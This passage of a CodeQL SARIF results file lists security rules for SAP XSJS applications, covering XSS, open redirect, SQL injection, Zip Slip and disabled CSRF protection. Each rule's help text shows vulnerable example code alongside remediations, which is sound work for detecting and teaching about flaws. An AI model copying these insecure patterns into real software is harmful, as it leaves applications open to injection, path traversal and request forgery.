syntax, such as `\"`, `&`, `'`, `<`, and `>`. Since XSJS does not provide a function to escape these, using a third-party library is recommended.\n\n#### Client-side sanitization\n\nAlternatively, if SAP UI5 is used on the frontend, there are client-side escaping mechanisms such as `sap.base.security.encodeXML` and `sap.base.security.encodeHTML`. If `sap.ui.core.HTML` is used in the frontend view, consider setting its `sanitizeContent` property explicitly to `true`, since its default value is `false`.\n\n## Example\n\nThe following XSJS application sets the response body directly to a string received from a user without any validation or sanitization. The header's content type is set as an HTML document, which allows for any embedded JavaScript to be run in the request body. Note that even if `clientData` was not enclosed in a `div`, the vulnerability would still exist.\n\n``` javascript\nlet clientData = requestParameters.get(\"someParameter\");\n$.response.contentType = \"text/html\";\n$.response.setBody(\"<div>\" + clientData + \"</div>\");\n$.response.status = $.net.http.OK;\n```\n\n## References\n\n* SAP: [Server-Side JavaScript Security Considerations](https://help.sap.com/docs/SAP_HANA_PLATFORM/d89d4595fae647eabc14002c0340a999/b5e65421b48c48fa87312a6023f4c414.html).\n* SAP: [Server-Side JavaScript: Cross-Site Scripting\n](https://help.sap.com/docs/SAP_HANA_PLATFORM/d89d4595fae647eabc14002c0340a999/0e1c9fff826a4583be715386578fffc7.html).\n* OWASP: [Types of Cross-site Scripting](https://owasp.org/www-community/Types_of_Cross-Site_Scripting).\n* OWASP: [Cross Site Scripting Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n\n"},"properties":{"tags":["security"],"description":"Including uncontrolled value into a response body and setting it to\n              a scriptable MIME type allows for cross-site scripting vulnerability.","id":"js/xsjs-reflected-xss","kind":"path-problem","name":"XSJS Reflected XSS","precision":"medium","problem.severity":"error","security-severity":"7.8"}},{"id":"js/xsjs-url-redirect","name":"js/xsjs-url-redirect","shortDescription":{"text":"XSJS URL Redirect"},"fullDescription":{"text":"Setting the `location` response header to an uncontrolled value allows for redirection to an arbitrary URL."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# URL Redirect\n\nAn HTTP response sent by an XSJS server whose value of the `location` header is dependent on a user input can redirect the client to an arbitrary location on the web by a malicious actor. For example, the redirected URL may point to a carefully imitated webpage of a genuine one, thus may lure a victim to submit its sign-in credentials.\n\n## Recommendation\n\nAvoid setting the entirety of URL or the domain part of it, which is obtained in any way from an external user, to the `location` header value, to keep redirection within the organization's domain. The URL to redirect the user to may be safely restricted by following one or more of the below strategies.\n\n### Redirect to a URL from an internal allow-list\n\nSelect the URL from a predefined allow-list that is kept internal. It may be shared across organizations, but should be kept confidential to any external actors.\n\n### Hardcode the domain part of the URL\n\nIf the URL to redirect the user to needs to be dependent upon a remote value, consider parameterizing only the request parameter portion and hardcode the rest of it, including the domain part. This way the redirection is kept within the organization.\n\n### Use a server-side template engine\n\nThere can be a single URL to which all redirection of the same type can happen where the redirected page can be customized to the customer with the help from a template engine. The details of the page can be filled from the server-side, not the client side through a request parameter. This way the URL does not need to be parameterized in any way while also filling the need for a customized redirect page.\n\n## Example\n\nThe following XSJS application sets the entire value of the location of its response to some URL retrieved from a request parameter.\n\n``` javascript\nlet someParameterValue = requestParameters.get(\"someParameter\");\n$.response.status = $.net.http.OK;\n$.response.headers.set(\"location\", someParameterValue);\n```\n\n## References\n\n* SAP: [Server-Side JavaScript Security Considerations](https://help.sap.com/docs/SAP_HANA_PLATFORM/d89d4595fae647eabc14002c0340a999/b5e65421b48c48fa87312a6023f4c414.html).\n* SAP: [Server-Side JavaScript: Invalid Redirection](https://help.sap.com/docs/SAP_HANA_PLATFORM/d89d4595fae647eabc14002c0340a999/8c5ec75c27f543cb8b4c65c337b285ae.html).\n* Mozilla: [Location](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Location).\n* OWASP: [XSS Unvalidated Redirects and Forwards Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n* Common Weakness Enumeration: [CWE-601](https://cwe.mitre.org/data/definitions/601.html).\n* SAP XSJS Documentation: [$.web.WebRequest](https://help.sap.com/doc/3de842783af24336b6305a3c0223a369/2.0.03/en-US/$.web.WebRequest.html).\n* SAP XSJS Documentation: [$.web.WebResponse](https://help.sap.com/doc/3de842783af24336b6305a3c0223a369/2.0.03/en-US/$.web.WebResponse.html).\n","markdown":"# URL Redirect\n\nAn HTTP response sent by an XSJS server whose value of the `location` header is dependent on a user input can redirect the client to an arbitrary location on the web by a malicious actor. For example, the redirected URL may point to a carefully imitated webpage of a genuine one, thus may lure a victim to submit its sign-in credentials.\n\n## Recommendation\n\nAvoid setting the entirety of URL or the domain part of it, which is obtained in any way from an external user, to the `location` header value, to keep redirection within the organization's domain. The URL to redirect the user to may be safely restricted by following one or more of the below strategies.\n\n### Redirect to a URL from an internal allow-list\n\nSelect the URL from a predefined allow-list that is kept internal. It may be shared across organizations, but should be kept confidential to any external actors.\n\n### Hardcode the domain part of the URL\n\nIf the URL to redirect the user to needs to be dependent upon a remote value, consider parameterizing only the request parameter portion and hardcode the rest of it, including the domain part. This way the redirection is kept within the organization.\n\n### Use a server-side template engine\n\nThere can be a single URL to which all redirection of the same type can happen where the redirected page can be customized to the customer with the help from a template engine. The details of the page can be filled from the server-side, not the client side through a request parameter. This way the URL does not need to be parameterized in any way while also filling the need for a customized redirect page.\n\n## Example\n\nThe following XSJS application sets the entire value of the location of its response to some URL retrieved from a request parameter.\n\n``` javascript\nlet someParameterValue = requestParameters.get(\"someParameter\");\n$.response.status = $.net.http.OK;\n$.response.headers.set(\"location\", someParameterValue);\n```\n\n## References\n\n* SAP: [Server-Side JavaScript Security Considerations](https://help.sap.com/docs/SAP_HANA_PLATFORM/d89d4595fae647eabc14002c0340a999/b5e65421b48c48fa87312a6023f4c414.html).\n* SAP: [Server-Side JavaScript: Invalid Redirection](https://help.sap.com/docs/SAP_HANA_PLATFORM/d89d4595fae647eabc14002c0340a999/8c5ec75c27f543cb8b4c65c337b285ae.html).\n* Mozilla: [Location](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Location).\n* OWASP: [XSS Unvalidated Redirects and Forwards Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n* Common Weakness Enumeration: [CWE-601](https://cwe.mitre.org/data/definitions/601.html).\n* SAP XSJS Documentation: [$.web.WebRequest](https://help.sap.com/doc/3de842783af24336b6305a3c0223a369/2.0.03/en-US/$.web.WebRequest.html).\n* SAP XSJS Documentation: [$.web.WebResponse](https://help.sap.com/doc/3de842783af24336b6305a3c0223a369/2.0.03/en-US/$.web.WebResponse.html).\n"},"properties":{"tags":["security"],"description":"Setting the `location` response header to an uncontrolled value\n              allows for redirection to an arbitrary URL.","id":"js/xsjs-url-redirect","kind":"path-problem","name":"XSJS URL Redirect","precision":"medium","problem.severity":"error","security-severity":"6.1"}},{"id":"js/xsjs-sql-injection","name":"js/xsjs-sql-injection","shortDescription":{"text":"XSJS SQL injection"},"fullDescription":{"text":"Directly concatenating an uncontrolled value with an SQL query allows for an SQL injection vulnerability."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# SQL Injection\n\nParameterizing an SQL statement in an unsafe way by directly concatenating the parameter to the statement body may allow arbitrary SQL code fragments to be included to the statement, resulting in possibly destructive behavior.\n\n## Recommendation\n\n### Use XSJS APIs that prepares SQL statements\n\nThere are two versions of API to communicate with SAP HANA, and both APIs provide means of preparing SQL statements that not only facilitates code reuse but also protects the parameterize statement from SQL injections.\n\nThese functions take as first argument an SQL string with placeholders represented as a question mark surrounded with parentheses (`(?)`), and the rest of the arguments consist of JavaScript expressions whose values are filled into the position of the respective placeholders.\n\n#### Using the older API (`$.db`)\n\nIf you are using the older API that belongs to `$.db`, consider replacing string concatentation with `$.db.executeQuery`. For example, the following XSJS application substitutes the value of `someParameterValue1` and `someParameterValue2` into the position of the first and second placeholder positions, respectively.\n\n``` javascript\nlet query = \"INSERT INTO (?) (COL1) VALUES (?)\";\n\nlet dbConnection = $.db.getConnection();\ndbConnection.executeQuery(query, someParameterValue1, someParameterValue2);\n```\n\n#### Using the newer API (`$.hdb`)\n\nIf you are using the newer API that belongs to `$.hdb`, consider replacing string concatentation with `$.hdb.Connection.prepareStatement` followed by `$.db.PreparedStatement.executeUpdate`. For example, the following XSJS application substitues the value of `someParameterValue1` and `someParameterValue2` into the position of the first and second placeholder positions, respectively. After preparation, the application executes the prepared statement and then commits it to the SAP HANA database.\n\n``` javascript\nlet query = \"INSERT INTO (?) (COL1) VALUES (?)\";\nlet dbConnection = $.db.getConnection();\nlet preparedStatement = dbConnection.prepareStatement(query, someParameterValue1, someParameterValue2);\npreparedStatement.executeUpdate();\ndbConnection.commit();\n```\n\n## Example\n\nEach of the following XSJS applications directly concatenates the values of two request paremeters with fragments of an SQL query and executes it.\n\n#### Using the older API (`$.db`)\n\n``` javascript\nlet someParameterValue1 = JSON.parse(requestParameters.get(\"someParameter1\"));\nlet someParameterValue2 = JSON.parse(requestParameters.get(\"someParameter2\"));\nlet query = \"INSERT INTO \" + someParameterValue1 + \".ENTITY (COL1) VALUES (\" + someParameterValue2 + \")\";\n\nlet dbConnection = $.db.getConnection();\nlet preparedStatement = dbConnection.prepareStatement(query);\npreparedStatement.executeUpdate();\ndbConnection.commit();\n```\n\n#### Using the newer API (`$.hdb`)\n\n``` javascript\nlet someParameterValue1 = JSON.parse(requestParameters.get(\"someParameter1\"));\nlet someParameterValue2 = JSON.parse(requestParameters.get(\"someParameter2\"));\nlet query = \"INSERT INTO \" + someParameterValue1 + \" (COL1) VALUES (\" + someParameterValue2 + \")\";\n\nlet dbConnection = $.db.getConnection();\ndbConnection.executeQuery(query);\ndbConnection.commit();\n```\n\n## References\n\n* SAP: [Server-Side JavaScript Security Considerations](https://help.sap.com/docs/SAP_HANA_PLATFORM/d89d4595fae647eabc14002c0340a999/b5e65421b48c48fa87312a6023f4c414.html).\n* SAP: [Server-Side JavaScript: Injection Flaws\n](https://help.sap.com/docs/SAP_HANA_PLATFORM/d89d4595fae647eabc14002c0340a999/3e9a0491d2af4b908081fbbee12bc8ba.html).\n* OWASP: [SQL Injection](https://owasp.org/www-community/attacks/SQL_Injection).\n* Common Weakness Enumeration: [CWE-89](https://cwe.mitre.org/data/definitions/89.html).\n* Common Weakness Enumeration: [CWE-943](https://cwe.mitre.org/data/definitions/943.html).\n","markdown":"# SQL Injection\n\nParameterizing an SQL statement in an unsafe way by directly concatenating the parameter to the statement body may allow arbitrary SQL code fragments to be included to the statement, resulting in possibly destructive behavior.\n\n## Recommendation\n\n### Use XSJS APIs that prepares SQL statements\n\nThere are two versions of API to communicate with SAP HANA, and both APIs provide means of preparing SQL statements that not only facilitates code reuse but also protects the parameterize statement from SQL injections.\n\nThese functions take as first argument an SQL string with placeholders represented as a question mark surrounded with parentheses (`(?)`), and the rest of the arguments consist of JavaScript expressions whose values are filled into the position of the respective placeholders.\n\n#### Using the older API (`$.db`)\n\nIf you are using the older API that belongs to `$.db`, consider replacing string concatentation with `$.db.executeQuery`. For example, the following XSJS application substitutes the value of `someParameterValue1` and `someParameterValue2` into the position of the first and second placeholder positions, respectively.\n\n``` javascript\nlet query = \"INSERT INTO (?) (COL1) VALUES (?)\";\n\nlet dbConnection = $.db.getConnection();\ndbConnection.executeQuery(query, someParameterValue1, someParameterValue2);\n```\n\n#### Using the newer API (`$.hdb`)\n\nIf you are using the newer API that belongs to `$.hdb`, consider replacing string concatentation with `$.hdb.Connection.prepareStatement` followed by `$.db.PreparedStatement.executeUpdate`. For example, the following XSJS application substitues the value of `someParameterValue1` and `someParameterValue2` into the position of the first and second placeholder positions, respectively. After preparation, the application executes the prepared statement and then commits it to the SAP HANA database.\n\n``` javascript\nlet query = \"INSERT INTO (?) (COL1) VALUES (?)\";\nlet dbConnection = $.db.getConnection();\nlet preparedStatement = dbConnection.prepareStatement(query, someParameterValue1, someParameterValue2);\npreparedStatement.executeUpdate();\ndbConnection.commit();\n```\n\n## Example\n\nEach of the following XSJS applications directly concatenates the values of two request paremeters with fragments of an SQL query and executes it.\n\n#### Using the older API (`$.db`)\n\n``` javascript\nlet someParameterValue1 = JSON.parse(requestParameters.get(\"someParameter1\"));\nlet someParameterValue2 = JSON.parse(requestParameters.get(\"someParameter2\"));\nlet query = \"INSERT INTO \" + someParameterValue1 + \".ENTITY (COL1) VALUES (\" + someParameterValue2 + \")\";\n\nlet dbConnection = $.db.getConnection();\nlet preparedStatement = dbConnection.prepareStatement(query);\npreparedStatement.executeUpdate();\ndbConnection.commit();\n```\n\n#### Using the newer API (`$.hdb`)\n\n``` javascript\nlet someParameterValue1 = JSON.parse(requestParameters.get(\"someParameter1\"));\nlet someParameterValue2 = JSON.parse(requestParameters.get(\"someParameter2\"));\nlet query = \"INSERT INTO \" + someParameterValue1 + \" (COL1) VALUES (\" + someParameterValue2 + \")\";\n\nlet dbConnection = $.db.getConnection();\ndbConnection.executeQuery(query);\ndbConnection.commit();\n```\n\n## References\n\n* SAP: [Server-Side JavaScript Security Considerations](https://help.sap.com/docs/SAP_HANA_PLATFORM/d89d4595fae647eabc14002c0340a999/b5e65421b48c48fa87312a6023f4c414.html).\n* SAP: [Server-Side JavaScript: Injection Flaws\n](https://help.sap.com/docs/SAP_HANA_PLATFORM/d89d4595fae647eabc14002c0340a999/3e9a0491d2af4b908081fbbee12bc8ba.html).\n* OWASP: [SQL Injection](https://owasp.org/www-community/attacks/SQL_Injection).\n* Common Weakness Enumeration: [CWE-89](https://cwe.mitre.org/data/definitions/89.html).\n* Common Weakness Enumeration: [CWE-943](https://cwe.mitre.org/data/definitions/943.html).\n"},"properties":{"tags":["security"],"description":"Directly concatenating an uncontrolled value with an SQL query allows\n              for an SQL injection vulnerability.","id":"js/xsjs-sql-injection","kind":"path-problem","name":"XSJS SQL injection","precision":"medium","problem.severity":"error","security-severity":"8.8"}},{"id":"js/xsjs-zip-slip","name":"js/xsjs-zip-slip","shortDescription":{"text":"XSJS Zip Slip"},"fullDescription":{"text":"Saving an entry of a zip archive into a file with its stated path allows for a path traversal and writing to an arbitrary location."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Zip Slip\n\nA zip archive received from a remote location may contain arbitrary paths which, when translated to an absolute path, may escape the directory where it is extracted. Such paths may include one or more `../` to traverse the directory tree upwards to write to an arbitrary location, such as the root directory (`/`) or a sensitive path like `/usr/local/`. A sophisticated attack may also attempt to overwrite an existing file by making the filename identical as that of the target file.\n\n## Recommendation\n\nValidate the path of each zip entry before writing them to a file. Several different tactics may be used to prevent the path traversal by one or more of `../` occuring in a zip entry's path.\n\n### Check if the path string contains `../`\n\nA naive but effective way to validate the path of a zip entry is to check if its path, converted to string, contains any occurrences of `../`. If a path does have one, then it can be suspected that the creator of the zip archive is attempting a path traversal attack.\n\n### Resolve the path and check if the target directory is its prefix \n\nA more sophisticated way is to use a JavaScript library function that can be used to check if a substring is a prefix of a string. For example, the following XSJS application uses `String.indexOf(substring)` to check if the name of the directory is indeed the directory resolved by `path.join(prefix, suffix)`. If the absolute path obtained by the `join` function does not start with the target folder's name, the `entryPath` contains bits such as `../` that traverses the path.\n\n``` javascript\nvar zipArchive = new $.util.Zip(requestBody.asArrayBuffer());\nvar targetFolderName = \"unzipped\";\n\nfor (var entryPath in zipArchive) {\n  var targetFilePath = require(\"path\").join(targetFolderName, entryPath)\n  if (targetFilePath.indexOf(targetFolderName) === 0) {\n    require(\"fs\").createWriteStream(targetFilePath).write(zip[entryPath]);\n  }\n}\n```\n\n### Example\n\nThis XSJS application simply appends the path of each entry to a target directory name and a separator then saves it to a file with the concatenated path, thereby skipping any validation on it.\n\n``` javascript\nvar zipArchive = new $.util.Zip(requestBody.asArrayBuffer());\nvar targetFolderName = \"unzipped\";\n\nfor (var entryPath in zipArchive) {\n  var targetFilePath = targetFolderName + \"/\" + entryPath;\n  require(\"fs\").createWriteStream(targetFilePath).write(zip[entryPath]);\n}\n```\n\n## References\n\n* SAP: [Server-Side JavaScript Security Considerations](https://help.sap.com/docs/SAP_HANA_PLATFORM/d89d4595fae647eabc14002c0340a999/b5e65421b48c48fa87312a6023f4c414.html).\n* OWASP: [Path Traversal](https://owasp.org/www-community/attacks/Path_Traversal).\n* SAP XSJS Documentation: [$.util.Zip](https://help.sap.com/doc/3de842783af24336b6305a3c0223a369/2.0.03/en-US/$.util.Zip.html).\n* Common Weakness Enumeration: [CWE-23](https://cwe.mitre.org/data/definitions/23.html).\n* Common Weakness Enumeration: [CWE-59](https://cwe.mitre.org/data/definitions/59.html).\n","markdown":"# Zip Slip\n\nA zip archive received from a remote location may contain arbitrary paths which, when translated to an absolute path, may escape the directory where it is extracted. Such paths may include one or more `../` to traverse the directory tree upwards to write to an arbitrary location, such as the root directory (`/`) or a sensitive path like `/usr/local/`. A sophisticated attack may also attempt to overwrite an existing file by making the filename identical as that of the target file.\n\n## Recommendation\n\nValidate the path of each zip entry before writing them to a file. Several different tactics may be used to prevent the path traversal by one or more of `../` occuring in a zip entry's path.\n\n### Check if the path string contains `../`\n\nA naive but effective way to validate the path of a zip entry is to check if its path, converted to string, contains any occurrences of `../`. If a path does have one, then it can be suspected that the creator of the zip archive is attempting a path traversal attack.\n\n### Resolve the path and check if the target directory is its prefix \n\nA more sophisticated way is to use a JavaScript library function that can be used to check if a substring is a prefix of a string. For example, the following XSJS application uses `String.indexOf(substring)` to check if the name of the directory is indeed the directory resolved by `path.join(prefix, suffix)`. If the absolute path obtained by the `join` function does not start with the target folder's name, the `entryPath` contains bits such as `../` that traverses the path.\n\n``` javascript\nvar zipArchive = new $.util.Zip(requestBody.asArrayBuffer());\nvar targetFolderName = \"unzipped\";\n\nfor (var entryPath in zipArchive) {\n  var targetFilePath = require(\"path\").join(targetFolderName, entryPath)\n  if (targetFilePath.indexOf(targetFolderName) === 0) {\n    require(\"fs\").createWriteStream(targetFilePath).write(zip[entryPath]);\n  }\n}\n```\n\n### Example\n\nThis XSJS application simply appends the path of each entry to a target directory name and a separator then saves it to a file with the concatenated path, thereby skipping any validation on it.\n\n``` javascript\nvar zipArchive = new $.util.Zip(requestBody.asArrayBuffer());\nvar targetFolderName = \"unzipped\";\n\nfor (var entryPath in zipArchive) {\n  var targetFilePath = targetFolderName + \"/\" + entryPath;\n  require(\"fs\").createWriteStream(targetFilePath).write(zip[entryPath]);\n}\n```\n\n## References\n\n* SAP: [Server-Side JavaScript Security Considerations](https://help.sap.com/docs/SAP_HANA_PLATFORM/d89d4595fae647eabc14002c0340a999/b5e65421b48c48fa87312a6023f4c414.html).\n* OWASP: [Path Traversal](https://owasp.org/www-community/attacks/Path_Traversal).\n* SAP XSJS Documentation: [$.util.Zip](https://help.sap.com/doc/3de842783af24336b6305a3c0223a369/2.0.03/en-US/$.util.Zip.html).\n* Common Weakness Enumeration: [CWE-23](https://cwe.mitre.org/data/definitions/23.html).\n* Common Weakness Enumeration: [CWE-59](https://cwe.mitre.org/data/definitions/59.html).\n"},"properties":{"tags":["security"],"description":"Saving an entry of a zip archive into a file with its stated path\n              allows for a path traversal and writing to an arbitrary location.","id":"js/xsjs-zip-slip","kind":"path-problem","name":"XSJS Zip Slip","precision":"medium","problem.severity":"error","security-severity":"7.5"}},{"id":"js/xsjs-disabled-csrf-protection","name":"js/xsjs-disabled-csrf-protection","shortDescription":{"text":"Disabled XSJS CSRF protection"},"fullDescription":{"text":"Disabling CSRF protection makes the application vulnerable to a Cross-Site Request Forgery (CSRF) attack."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# CSRF protection disabled in HANA XS application\n\nThis XS application is not protected against CSRF (cross-site request forgery) because it either disables the protection or fails to enable the protection explicitly.\n\n## Overview\n\nA web server that receives a request from a client without verifying that it was intentionally sent might be vulnerable to Cross Site Request Forgery (CSRF). An attacker can trick a client into making an unintended request to the web server that will be treated as an authentic request. This can be done via a URL, image load, `XMLHttpRequest`, etc. and can result in exposure of data or unintended code execution.\n\n## Recommendation\n\nSAP’s recommendation is to use CSRF protection for any request that could be processed by a browser client by normal users.\n- If `XS Advanced` is used, CSRF protection is configured with the `\"csrfProtection\"` property of `xs-app.json`. It is **enabled by default and should not be disabled.**\n- If `XS Classic` is used, CSRF protection is configured with the `\"prevent_xsrf\"` property of `.xsaccess`. It is **disabled by default and should be enabled explicitly.**\n\n## Example\n\nThe following `xs-app.json` fragment disables CSRF protection of the application it configures.\n\n```json\n\"routes\": [\n    {\n        \"source\": \"/bad/(.*)\",\n        \"destination\": \"srv_api\",\n        \"csrfProtection\": false,\n        ...\n    },\n    ...\n]\n```\n\n## References\n\n- SAP: [XS Advanced Application Router Configuration Syntax](https://help.sap.com/docs/SAP_HANA_PLATFORM/b3d0daf2a98e49ada00bf31b7ca7a42e/a9fc5c220d744180850996e2f5d34d6c.html?version=2.0.03#loioa9fc5c220d744180850996e2f5d34d6c__section_N101F7_N10016_N10001), relavant to XS Classic applications.\n- SAP: [Application-Access File Keyword Options, prevent_xsrf](https://help.sap.com/docs/SAP_HANA_PLATFORM/4505d0bdaf4948449b7f7379d24d0f0d/5f77e58ec01b46f6b64ee1e2afe3ead7.html#authenticationmethod), relevant to XS Advanced applications.\n- SAP: [Server-Side JavaScript Security Considerations](https://help.sap.com/docs/SAP_HANA_PLATFORM/d89d4595fae647eabc14002c0340a999/e8a6bc904c0c48a182288604f467e84a.html).\n- Common Weakness Enumeration: [CWE-352](https://cwe.mitre.org/data/definitions/352.html).\n- OWASP: [Cross-Site Request Forgery (CSRF)](https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)).\n","markdown":"# CSRF protection disabled in HANA XS application\n\nThis XS application is not protected against CSRF (cross-site request forgery) because it either disables the protection or fails to enable the protection explicitly.\n\n## Overview\n\nA web server that receives a request from a client without verifying that it was intentionally sent might be vulnerable to Cross Site Request Forgery (CSRF). An attacker can trick a client into making an unintended request to the web server that will be treated as an authentic request. This can be done via a URL, image load, `XMLHttpRequest`, etc. and can result in exposure of data or unintended code execution.\n\n## Recommendation\n\nSAP’s recommendation is to use CSRF protection for any request that could be processed by a browser client by normal users.\n- If `XS Advanced` is used, CSRF protection is configured with the `\"csrfProtection\"` property of `xs-app.json`. It is **enabled by default and should not be disabled.**\n- If `XS Classic` is used, CSRF protection is configured with the `\"prevent_xsrf\"` property of `.xsaccess`. It is **disabled by default and should be enabled explicitly.**\n\n## Example\n\nThe following `xs-app.json` fragment disables CSRF protection of the application it configures.\n\n```json\n\"routes\": [\n    {\n        \"source\": \"/bad/(.*)\",\n        \"destination\": \"srv_api\",\n        \"csrfProtection\": false,\n        ...\n    },\n    ...\n]\n```\n\n## References\n\n- SAP: [XS Advanced Application Router Configuration Syntax](https://help.sap.com/docs/SAP_HANA_PLATFORM/b3d0daf2a98e49ada00bf31b7ca7a42e/a9fc5c220d744180850996e2f5d34d6c.html?version=2.0.03#loioa9fc5c220d744180850996e2f5d34d6c__section_N101F7_N10016_N10001), relavant to XS Classic applications.\n- SAP: [Application-Access File Keyword Options, prevent_xsrf](https://help.sap.com/docs/SAP_HANA_PLATFORM/4505d0bdaf4948449b7f7379d24d0f0d/5f77e58ec01b46f6b64ee1e2afe3ead7.html#authenticationmethod), relevant to XS Advanced applications.\n- SAP: [Server-Side JavaScript Security Considerations](https://help.sap.com/docs/SAP_HANA_PLATFORM/d89d4595fae647eabc14002c0340a999/e8a6bc904c0c48a182288604f467e84a.html).\n- Common Weakness Enumeration: [CWE-352](https://cwe.mitre.org/data/definitions/352.html).\n- OWASP: [Cross-Site Request Forgery (CSRF)](https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)).\n"},"properties":{"tags":["security","external/cwe/cwe-352"],"description":"Disabling CSRF protection makes the application vulnerable to a Cross-Site Request Forgery (CSRF) attack.","id":"js/xsjs-disabled-csrf-protection","kind":"problem","name":"Disabled XSJS CSRF protection","precision":"high","problem.severity":"error","security-severity":"8.8"}}],"locations":[{"uri":"file:///home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/xsjs/src/","description":{"text":"The QL pack root directory."},"properties":{"tags":["CodeQL/LocalPackRoot"]}},{"uri":"file:///home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/xsjs/src/qlpack.yml","description":{"text":"The QL pack definition file."},"properties":{"tags":["CodeQL/LocalPackDefinitionFile"]}}]},{"name":"advanced-security/javascript-sap-xsjs-models","semanticVersion":"2.3.0","locations":[{"uri":"file:///home/runner/work/codeql-sap-js/codeql-sap-js/.github/codeql/extensions/javascript/frameworks/xsjs/ext/ext/","description":{"text":"The QL pack root directory."},"properties":{"tags":["CodeQL/LocalPackRoot"]}},{"uri":"file:///home/runner/work/codeql-sap-js/codeql-sap-js/.github/codeql/extensions/javascript/frameworks/xsjs/ext/ext/qlpack.yml","description":{"text":"The QL pack definition file."},"properties":{"tags":["CodeQL/LocalPackDefinitionFile"]}}],"properties":{"isCodeQLModelPack":true}}]},"invocations":[{"toolExecutionNotifications":[{"locations":[{"physicalLocation":{"artifactLocation":{"uri":".cds-extractor-cache/cds-5821ca4a7405c17bc03fe9c833aa52212563b6d17f24eb61f8af574bf1095ef1/node_modules/@sap/cds-dk/node_modules/encoding/node_modules/iconv-lite/.idea/codeStyles/Project.xml","uriBaseId":"%SRCROOT%","index":4}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":".cds-extractor-cache/cds-5821ca4a7405c17bc03fe9c833aa52212563b6d17f24eb61f8af574bf1095ef1/node_modules/@sap/cds-dk/node_modules/encoding/node_modules/iconv-lite/.idea/inspectionProfiles/Project_Default.xml","uriBaseId":"%SRCROOT%","index":5}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":".cds-extractor-cache/cds-419af57a6ca03c33e081f24fe025fd9562eb8de8ad926dd10c59ce86d3bfee92/node_modules/@sap/cds-dk/node_modules/xml-js/bin/test.xml","uriBaseId":"%SRCROOT%","index":6}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":".cds-extractor-cache/cds-5821ca4a7405c17bc03fe9c833aa52212563b6d17f24eb61f8af574bf1095ef1/node_modules/@sap/cds-dk/node_modules/encoding/node_modules/iconv-lite/.idea/codeStyles/codeStyleConfig.xml","uriBaseId":"%SRCROOT%","index":7}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":".cds-extractor-cache/cds-5821ca4a7405c17bc03fe9c833aa52212563b6d17f24eb61f8af574bf1095ef1/node_modules/@sap/cds-dk/node_modules/encoding/node_modules/iconv-lite/.idea/modules.xml","uriBaseId":"%SRCROOT%","index":8}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":".cds-extractor-cache/cds-5821ca4a7405c17bc03fe9c833aa52212563b6d17f24eb61f8af574bf1095ef1/node_modules/@sap/cds-dk/node_modules/encoding/node_modules/iconv-lite/.idea/vcs.xml","uriBaseId":"%SRCROOT%","index":9}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":".cds-extractor-cache/cds-5821ca4a7405c17bc03fe9c833aa52212563b6d17f24eb61f8af574bf1095ef1/node_modules/@sap/cds-dk/node_modules/xml-js/bin/test.xml","uriBaseId":"%SRCROOT%","index":10}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":".github/codeql/codeql-config.yaml","uriBaseId":"%SRCROOT%","index":11}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":".github/codeql/extensions/javascript/frameworks/ui5/ext/ext/qlpack.yml","uriBaseId":"%SRCROOT%","index":12}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":".github/codeql/extensions/javascript/frameworks/ui5/ext/ext/codeql-pack.lock.yml","uriBaseId":"%SRCROOT%","index":13}}}],"message":{"text":""},"level"